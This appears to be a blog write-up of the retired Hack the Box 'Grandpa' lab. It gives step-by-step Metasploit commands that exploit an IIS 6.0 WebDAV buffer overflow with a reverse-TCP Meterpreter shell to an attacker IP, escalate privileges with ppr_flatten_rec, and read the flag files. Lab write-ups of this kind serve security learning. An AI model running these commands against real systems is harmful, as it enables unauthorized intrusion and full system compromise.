Hello friends!! Today we are going to solve another CTF challenge
“Grandpa” which is lab presented by Hack
the Box for making online penetration practices according
to your experience level. They have collection of vulnerable labs as challenges
from beginners to Expert level. HTB have two partitions of lab i.e. Active and
retired since we can’t submit write up of any Active lab therefore we have
chosen retried Grandpa Lab.
Level: Beginners
Task: find user.txt and root.txt file in victim’s machine.
Let’s
begin the Game!!
Since these labs are online available therefore they have static
IP and IP of Grandpa is 10.10.10.14 so let’s begin with nmap
port enumeration.
nmap -p- -sV 10.10.10.14
From nmap result I found
following information.
Open port: 80 for http
Service version: Microsoft
IIS httpd 6.0
Os : Windows machine.
Then I used searcgsploit
for iis 6.0 and found a Remote Buffer overflow vulnerability in Microsoft IIS
httpd 6.0, you can check this exploit in google aslo.
Then I run msfconsole
command in terminal and load metasploit framework for using Microsoft IIS
WebDav ScStoragePathFromUrl Overflow module for exploiting target machine.
use
exploit/windows/iis/iis_webdav_scstoragepathfromurl
msf
exploit(windows/iis/iis_webdav_scstoragepathfromurl) set rhost 10.10.10.14
(target IP)
msf
exploit(windows/iis/iis_webdav_scstoragepathfromurl) set payload
windows/meterpreter/reverse_tcp
msf
exploit(windows/iis/iis_webdav_scstoragepathfromurl) set lhost 10.10.14.3
(attacker IP)
msf
exploit(windows/iis/iis_webdav_scstoragepathfromurl) set lport 4444
msf
exploit(windows/iis/iis_webdav_scstoragepathfromurl) run
Terrific!! I
have got unauthorized access of victims command shell through session 1 as shown in below image.
Then I run command getuid
for identify user ID and current process but it failed due to limited shell
access we have in session 1 and now we need to privilege escalation.
For that background
your current meterpreter shell and go for post exploitation.
Then I run a post exploit “Multi Recon Local Exploit
Suggester” that suggests local meterpreter exploits that can be used for
further exploit. The exploits are recommended
founded on the architecture and platform that the user has a shell opened as
well as the available exploits in meterpreter.
use
post/multi/recon/local_exploit_suggester
msf
post(multi/recon/local_exploit_suggester) > set session 1
msf
post(multi/recon/local_exploit_suggester) > run
Wonderful!!
Exploit Suggester truly proof itself by suggesting other exploit name to which
target is vulnerable. So now we will go with last option as highlighted in
image.
At this time use pprFlattenRec Local Privilege Escalation
module for making unauthorized access again but as privileged user.
use
exploit/windows/local/ppr_flatten_rec
msf
exploit(windows/local/ppr_flatten_rec) > set lhost 10.10.14.3
msf
exploit(windows/local/ppr_flatten_rec) > set lport 4455
msf
exploit(windows/local/ppr_flatten_rec) > run
Nice!! It works
and we got meterpreter session 2 as system user and you can check in below
image.
Meterpreter >
getuid
Now let’s complete this task my searching user.txt and
root.txt flag which is hidden somewhere inside a directory.
Meterpreter > shell
Inside c:\Document
and Setting\Harry\Desktop I found user.txt
file and used type “file name” command for reading this file.
cd Desktop
type user.txt
Great!! We got
our 1st flag successfully
Inside c:\Document
and Setting\Administrtator \Desktop I found root.txt file and used type “file name” command for reading this
file.
cd Desktop
typeroot.txt
Great!! We got
our 2st flag successfully
Breaching this lab was interesting and enjoyable moment for
me. It will take less time if you are aware of proper metasploit exploits.
Therefore I will give all Glory to
Metasploit for making this challenge easy for me.
Happy Hacking!!
0 comments:
Post a Comment